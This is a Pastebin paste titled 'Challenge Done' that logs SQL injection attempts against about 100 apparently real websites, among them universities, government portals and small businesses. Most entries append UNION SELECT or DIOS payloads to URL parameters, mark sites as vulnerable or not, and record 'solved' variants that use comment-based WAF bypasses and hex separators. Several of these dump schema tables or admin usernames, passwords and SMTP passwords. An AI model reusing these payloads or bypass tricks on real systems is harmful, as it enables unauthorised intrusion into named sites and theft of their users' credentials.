API tools faq
paste
Advertisement
exengg

Challenge Done

exengg
May 14th, 2019
722
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.71 KB | None | 0 0
raw download clone embed print report
  1. problems
  2.  
  3. 1.http://esjindex.org/search.php?id=-1'+#uNiOn+#sEleCt 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- -
  4. 2.https://mahara.org/group/view.php?id=1
  5. 3.https://www.jdcaravan.com/store.php?id=1 error e nai
  6.  
  7. 3 site not vln
  8.  
  9. 4.https://www.jbctools.com/cataleg.php?id=1
  10. 5.http://www.silverngrace.com/productlist.php?id=1
  11.  
  12. 5 site not vln
  13.  
  14. 6.http://www.microtek.com/products.php?KindID=6&ID=-1+UNION+ALL+SELECT+1,2,3,4,5,6,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70-- -
  15. ##have username,password column but show error to find them
  16. 7.http://isr-tkd.com/index.php?cntr=e/news.php?id=1
  17.  
  18. 7 php error not sql
  19.  
  20. 8.https://www.bnl.gov/ps/beamlines/highlights.php?q=4-ID [error not fixed,.gov site]
  21.  
  22. 8 site premanently moved
  23.  
  24. 9.https://www.jewishgen.org/databases/cemetery/jowbrshow.php?ID=ISR-07022
  25. 10.http://www.rorschach.com/index.php?id=47
  26. 11.http://www.rorschach.com/index.php?id=47 [no error]
  27.  
  28. 11. secure firawall
  29.  
  30. 12.https://www.provision-isr.com/index.php?option=com_sppagebuilder&view=page&id=7&Itemid=302 [no error]
  31. 13.https://isr.umd.edu/news/news_story.php?id=6948 [no error]
  32. 14.http://www.inquiryinaction.org/classroomactivities/activity.php?id=2'+ORDER+BY+1-- - [order by gives error]
  33. 15.https://www.mnmindia.org/portfolio.php?id=1'+UNION+ALL+SELECT+1,2,3,4,5,6-- - [vulnerable column not found]
  34. 16.http://www.rockinmusic.net/album_list.php?id=-1'+UNION+ALL+SELECT+1,2-- - [DIOS creates error](column count error half fix...)
  35. 17.http://www.renickbell.net/doku.php?id=music
  36.  
  37. 17 site not vln
  38.  
  39. 19.http://www.rinkydinkelectronics.com/library.php?id=51'-- - [error not fixed]
  40. 20.https://www.bloody.com/en/download.php?id=6' [no errror]
  41.  
  42. 20 site not vln this is so popular site for gamers maybe they hae bounty program
  43.  
  44. 21.http://www.jncasr.ac.in/annview.php?id=838-- - [you are not authorised to view gthis site]
  45. 22.https://www.eia.gov/tools/faqs/faq.php?id=427'-- - [error not fixed]
  46.  
  47. 22 same as 30 No.
  48.  
  49. 23.https://www.pwaworldtour.com/index.php?id=2208' [no error]
  50.  
  51. 23 site not vln
  52.  
  53. 24.https://stockcharts.com/school/doku.php?id=chart_school:technical_indicators:relative_strength_index_rsi+ORDER+BY+500-- -
  54.  
  55. 24 site not vln
  56.  
  57. 25.https://kb.wisc.edu/helpdesk/page.php?id=12384-- - [error not fixed]
  58. 26.http://www.iea-pvps.org/index.php?id=6' [no error]
  59.  
  60. 26 site not vln
  61.  
  62. 27.https://www.baylor.edu/law/index.php?id=929875' [....]
  63.  
  64. 27 site not vln
  65.  
  66. 28.http://americanvalues.org/search/item.php?id=18' [page not found,how to fix]
  67.  
  68. 28 site redirect and no redirect not working :(
  69.  
  70. 29.https://www.fleurlis.com.tw/en/scene.php?cid=1&id=-2+UNION+ALL+SELECT+1,2,3,4,group_concat(table_name,'::',column_name),6,7,8,9 from information_schema.columns where table_schema=database()-- - [using anything as the separator of table,column creates error]
  71.  
  72. ** convert in hex then use anything**
  73. 29 (solved) https://www.fleurlis.com.tw/en/scene.php?cid=1&id=-2+UNION+ALL+SELECT+1,2,3,4,group_concat(table_name,0x3d3e,column_name),6,7,8,9 from information_schema.columns where table_schema=database()-- -
  74.  
  75. 30.https://www.eia.gov/todayinenergy/detail.php?id=34812-- -
  76.  
  77. 30 not sure but its us gov site i don't think sqli
  78.  
  79. 31.https://www.edison-bd.com/company_details.php?id=-7'+UNION+ALL+SELECT+1,2,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),4,5,6,7,8,9,10,11,12-- - [don't work without DIOS]
  80.  
  81. 31 then use dios sometimes dios work like waff bypass
  82.  
  83. 32.http://weppi.gtk.fi/publ/foregsatlas/article.php?id=7' [query failed]
  84.  
  85. 32 (solved) http://weppi.gtk.fi/publ/foregsatlas/article.php?id=-7 +UNION+ALL+SELECT+1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6,7 -- -
  86.  
  87. 33.http://www.hausalpenrose.com/index.php?id=83 [error site,string fix the error of the site]
  88.  
  89. 33 no redirect not work :(
  90.  
  91. 34.https://www.stradeproject.eu/index.php?id=7-- - [error not fixed]
  92.  
  93. 34 not vuln
  94.  
  95. 35.https://www.hcidhaka.gov.in/pages?id=eyJpdiI6InJvYzZwVFNjemRHXC9BcktoVjFBaUVBPT0iLCJ2YWx1ZSI6InlOcmg0NGRSeWlPc1psZzVlYTNyK0E9PSIsIm1hYyI6ImM4ZTA3NGI1NDU4M2FmM2Q4YzY5MzZmYTBlZjU1MDE1ZTYxZTFhOGRhZjEzYTk3YWFjZmIyYTkxMmNkZmViMDkifQ== [so long parameter]
  96.  
  97. 35 encoded in base 64
  98.  
  99. 36.http://project-lovcen.me/page.php?id=6-- - [error not fixed]
  100. 37.https://mvss.in/gallery.php?id=-6+UNION+ALL+SELECT+@@database-- - [don't show database but show version()]
  101.  
  102. **don't use + ***
  103. 37 (solved) https://mvss.in/gallery.php?id=-6 UNION ALL SELECT /*!12345database()*/ -- -
  104.  
  105. 38.http://bdlaws.minlaw.gov.bd/print_sections_all.php?id=25 order by 1-- - [order by creates error]
  106.  
  107. 38 secure firewall
  108.  
  109. 39.https://www.99marriageguru.com/post.php?id=-19+UNION+ALL+SELECT+1,2,group_concat(table_name,column_name),4,5,6,7,8,9 from information_schema.columns where table_schema=database()-- - [table_name,column_name seperator and '<br>'creates error]
  110.  
  111. ** use hex sometime br not work**
  112. 39 (solved) https://www.99marriageguru.com/post.php?id=-19+UNION+ALL+SELECT+1,2,group_concat(table_name,0x3c62723e,column_name),4,5,6,7,8,9 from information_schema.columns where table_schema=database()-- -
  113.  
  114. 40.https://www.galileo.net.in/prod.php?id=-9+UNION+ALL+SELECT+1,2,3,4-- -
  115.  
  116. 40 (solved) https://www.galileo.net.in/prod.php?id=-9 +/*!12345UNION*/+ALL+SELECT+1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3,4 -- -
  117.  
  118. 41.http://alexmonteith.com/works.php?category=film&name=Film/work_detail.php?id=77'-- - [....]
  119.  
  120. 41 not vlnrbl
  121.  
  122. 42.http://www.maxforlive.com/library/device.php?id=331-- - [not fixed]
  123.  
  124. 42 not sql error maybe
  125.  
  126. 43.http://www.oar-info.ru/index.php?id=138-- - [errox not fixed:too many forward attempts]
  127.  
  128. 43 come on dude rashian site :p maybe security high
  129.  
  130. 44.http://sociedadanonima.mx/Projects.php?Id=101-- - [error not fixed]
  131. 45.http://www.vgloop.com/group.php?id=-292+/*!50000UNION*/+ALL+SELECT+1-- -
  132.  
  133. ***use no redirect***
  134. 45 (solved) http://www.vgloop.com/group.php?id=-292 +/*!12345UNION*/+ALL+SELECT+make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@) -- -
  135.  
  136. 46.http://asakusa-i.tokyo/e/shops/shop.php?id=-5+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16-- - [vulnerable column found but version(),database() gives error]
  137.  
  138. 46 language japan :/
  139.  
  140. 47.http://www.amarbooks.com/cat.php?cd=183-- - [403 forbidden]
  141.  
  142. 47 peram load hocche na
  143.  
  144. 48.http://www.amarbooks.com/download.php?id=18305 order by 1-- - [how many columns]
  145. 47 peram load hocche na
  146. 49.http://www.freebanglafont.com/download.php?id=752+ORDER+BY+100-- - [how many columns]
  147.  
  148. 49 maybe not sql error check content when error
  149.  
  150. 50.https://seu.edu.bd/dept/cse.php?id=vision-- - [error not fixed]
  151.  
  152. 50 not sql error
  153.  
  154. 51.https://www.nitolinsurance.com/news_details.php?id=-1'+UNION+ALL+SELECT+1,,3,4-- - [when put sername,password it gives error]
  155.  
  156. 51 (solved) https://www.nitolinsurance.com/news_details.php?id=-1' +UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT(username,password+SEPARATOR+0x3c62723e)+FROM+nitolins_website.admin) -- -
  157.  
  158. 52.http://kyanc.edu.bd/employee-view.php?id=4
  159.  
  160. ***parm 4 is not vlnrbl**
  161. 52 (solved) http://kyanc.edu.bd/page.php?id=-2' +UNION+ALL+SELECT+1,2,(/*!%53ELECT*/+/*!50000GROUP_CONCAT(table_name%20SEPARATOR%200x3c62723e)*//**//*!%46ROM*//**//*!INFORMATION_SCHEMA.TABLES*//**//*!%57HERE*//**//*!TABLE_SCHEMA*//**/LIKE/**/DATABASE()),4,5,6 -- -
  162.  
  163. 53.http://khpg.org/en/index.php?id=1551054011'-- -
  164. 54.http://www.pacbi.org/etemplate.php?id=1451'+ORDER+BY+100000-- - [no. of columns]
  165.  
  166. 54 This website has moved but this site will still be visible as an arhive.
  167.  
  168. 55.http://www.minddesign.co.uk/show.php?id=-174'+UNION+ALL+SELECT+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables where table_schema=database()-- - [illigal mix error]
  169. 56.https://www.ileswastesystems.co.uk/index.php?id=-1'+UNION+ALL+SELECT+1,2,3-- - [....]
  170. 57.http://www.josleys.com/article_show.php?id=82' [invalid input]
  171. 58.https://jobs.bdjobs.com/jobdetails.asp?id=838856-- -
  172.  
  173. 58 MSSQL
  174.  
  175. 59.http://www.bdjobstoday.com/jobsbycategory.php?cat=4' order by 1-- - [order by creates error]
  176. 60.https://jobs.bdjobs.com/m/jobsearch.aspx?fcatId=1-- - [error not fixed]
  177.  
  178. 60 MSSQL
  179.  
  180. 61.http://www.filmposter-archiv.de/filmplakat.php?id=29121-- -
  181.  
  182. 61 page moved permanently
  183.  
  184. 62.http://bdlaws.minlaw.gov.bd/bangla_pdf_part.php?id=1105+ORDER+BY+1-- - [order by creates error]
  185.  
  186. 62 strong firewall
  187.  
  188. 63.http://www.sneaindia.com/Admin_index.php?id=11 union select 1-- - [column no]
  189. 64.https://www.eduhelpindia.com/college.php?id=-1541' /*!50000union*/ select 1,2,3,group_concat(table_name,column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32from information_schema.columns where table_schema=database()-- - [group_concat creates error]
  190.  
  191. 64 (solved) https://www.eduhelpindia.com/college.php?id=-1541' /*!50000union*/ select 1,2,3,/*!13337group_concat(table_name,'::',column_name)*/,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 /*!12345from*/ /*!12345information_schema.columns*/ /*!50000where*/ /*!13337table_schema*/=/*!50000database()*/-- -
  192.  
  193. 65.http://www.pbw-india.com/category.php?id=-1 /*!50000union*/ select 1,2,3,4,5,6,7,8-- - [don't show vulnerable column]
  194.  
  195. 65 page permanently moved
  196.  
  197. 66.https://www.hotelmetdelhi.com/pages.php?id=-84'+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10-- - [don't show vulnerable column]
  198.  
  199. 66 (solved) view-source:https://www.hotelmetdelhi.com/pages.php?id=78'+UNION+ALL+SELECT+1,2,3,group_concat(column_name),5,6,7,8,9,10 from information_schema.columns where table_name='yp_admin'-- -
  200.  
  201. 67.http://www.channel-bd.net/channel.php?id=-207'+/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),14-- - [gives error to find password & user]
  202.  
  203. 67 firewall maybe so strong
  204.  
  205. 68.http://naasindia.org/detail.php?id=624 order by 1-- - [order by creates error]
  206. 69.http://www.pcs.org.ps/yZLN/pU2dL.php?id=258808+ORDER+BY+10-- -
  207.  
  208. 69 site is ok
  209.  
  210. 70.http://www.repetidordisc.com/ing/bandas.php?id=-15+UNION+ALL+SELECT+1,group_concat(table_name,'::',column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from information_schema.columns where table_schema=database()-- - [use of seperator makes error]
  211.  
  212. view-source:http://www.repetidordisc.com/ing/bandas.php?id=-15 UNION ALL SELECT 1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 -- -
  213.  
  214. 71.https://kb.wisc.edu/page.php?id=81448-- -
  215. 72.https://www.h-net.org/jobs/job_display.php?id=58048-- -
  216. 73.http://www.ryans-muddy-boot.net/index.php?id=5--
  217.  
  218. 73 page not found
  219.  
  220. 74.http://bd-motor.com/page.php?action=pview&id=-563' /*!50000union*/ select 1,(SELECT+GROUP_CONCAT(smtppass+SEPARATOR+0x3c62723e)+FROM+bdmotor_bd.settings),3,4,5,6,7,8-- - [gives error in the last moment]
  221.  
  222. 74 (Solved) http://bd-motor.com/page.php?action=pview&id=-563' /*!50000union*/ select 1,2,3,4,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),6,7,8-- -
  223.  
  224. 75.http://www.gaysport.cz/index.php?id=-2 /**/UNION/**//*!50000SELECT*//**/ 1,2-- - [failed to bypass]
  225. 76.http://lola.land/projecten.php?id=-80+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- - [don't show vulnerable columns]
  226.  
  227. 76 no redirect not working :(
  228.  
  229. 77.https://www.rhinebeckcsd.org/pagecontent.php?id=-14 /*!50000union*/ select 1,2,3,4,,,7,8,9,10,11,12-- - [not showing vulnerable column]
  230. 78.http://www.greenhorizon.lk/selection.php?id=-19 /*!50000union*/ select 1-- - [500 server error not fixed]
  231. 79.https://survey.gov.lk/epy/single.php?id=-1'+UNION+ALL+SELECT+1-- - [vulnerable column not found]
  232. 80.http://surf-lanka.com/placeinfo.php?id=-1'+UNION+ALL+SELECT+1,group_concat(username,password),3,4,5,6,7,8,9,10 from dqsrt_surflanka-- - [don't show pass,uname]
  233.  
  234. 80 load hocche na
  235.  
  236. 81.http://www.jlbender.nl/indexvt.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151-- - [don't show vulnerable column]
  237. 82.https://www.wecaregreybruce.ca/ytopic.php?id=-5'+UNION+ALL+SELECT+1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3,4,5-- - [403 forbidden]
  238.  
  239. 82 (solved) https://www.wecaregreybruce.ca/ytopic.php?id=-5' UNION ALL SELECT 1,/*!12345group_concat(table_name,0x3c62723e)*/,3,4,5 /*!12345from*/ /*!13337information_schema.tables*/ /*!50000where*/ /*!12345table_schema*/=/*!13337database()*/ -- -
  240.  
  241. 83.http://www.mwnuk.co.uk/resourcesDetail.php?id=-97+/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12-- -
  242.  
  243. 83 page moved permanently
  244.  
  245. 84.http://www.true-magic.com/view.php?id=1-- - [not fixed]
  246. 85.https://www.hotelmetdelhi.com/pages.php?id=-96'+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10-- - [not showing vulnerable column]
  247.  
  248. 85 (solved) view-source:https://www.hotelmetdelhi.com/pages.php?id=78'+UNION+ALL+SELECT+1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6,7,8,9,10 -- -
  249.  
  250. 86.http://www.thekhyber.co.uk/menu.php?id=-40'+UNION+ALL+SELECT+1,2,group_concat(id,pal),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 from aquarious_core-- - [error]
  251.  
  252. 86 (solved) http://www.thekhyber.co.uk/menu.php?id=-40' +UNION+ALL+SELECT+1,2,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 -- -
  253.  
  254. 87.http://www.ipicgroup.com/shopping_centre.php?id=-1+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(username,password+SEPARATOR+0x3c62723e)+FROM+ipicgr_db1.users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- - [error in the last cmd]
  255.  
  256. 88(solved) http://www.ipicgroup.com/shopping_centre.php?id=-1 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),14,15,16,17 -- -
  257.  
  258. 88.http://createmytravel.co.in/hotel-details.php?id=-6 /*!50000union*/ select 1,2,3,4,5,6,7,8,9,10,11,(SELECT+GROUP_CONCAT(username,password+SEPARATOR+0x3c62723e)+FROM+Integrb2_createmytravel .tbl_admin),13-- -[cmd-error-not acceptable ]
  259.  
  260. 88 site load hocche na
  261.  
  262. 89.https://lcps-lebanon.org/featuredArticle.php?id=-137 /*!50000union*/ select 1,2,@@database,4,5,6,7,8,9-- - [inclusion of database gives error]
  263.  
  264. 89 load hocche na
  265.  
  266. 90.http://www.fidelity.com.lb/page.php?id=7-- - [error half fixed]
  267.  
  268. 90 site load hocche na
  269.  
  270. 91.http://www.aayanre.com/project-cat.php?id=1' /*!50000union+select*/ 1,2,3,4-- - [query failed]
  271. 92.http://www.ijqr.net/paper.php?id=-638' /*!50000union*/ select 1,2,3,4,5,6,7,8,(SELECT+GROUP_CONCAT(username,password+SEPARATOR+0x3c62723e)+FROM+ijqr_ijqr.openconf_reviewer),10,11,12,13,14,15-- -
  272.  
  273. 92 (solved) http://www.ijqr.net/paper.php?id=-638' /*!50000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)-- -
  274.  
  275. 93.http://agrofor.ues.rs.ba/paper.php?id=12-- - [error not fixed]
  276. 94.http://wondernexa.com/car.php?id=-1 /**/UNION/**//*!50000SELECT*//**/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- - [....]
  277. 95.http://www.antypas1.com/cars.php?id=3-- - [forbidden,no permission]
  278. 96.http://wondercars.net/get-email-car.php?id=-12 /*!50000union*/ select 1,2,3,4-- - different number of column
  279. 97.https://www.iautocars.com/sales/vehicle.php?id=-1' /*!50000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- -
  280.  
  281. 97 (solved) https://www.iautocars.com/sales/vehicle.php?id=-1' +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),19,20,21,22,23,24,25,26,27,28,29,30,31 -- -
  282.  
  283. 98.http://www.nrhz.de/flyer/beitrag.php?id=-24002'+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- - [not showing vulnerable column]
  284.  
  285. 98(solved) http://www.nrhz.de/flyer/beitrag.php?id=-24002' +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- -
  286.  
  287. 99.http://www.alda-europe.eu/newSite/project_dett.php?ID=57-- - [access denied]
  288. 100.https://36igc.org/page.php?id=17'+ORDER+BY+1-- - [order by gives error]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!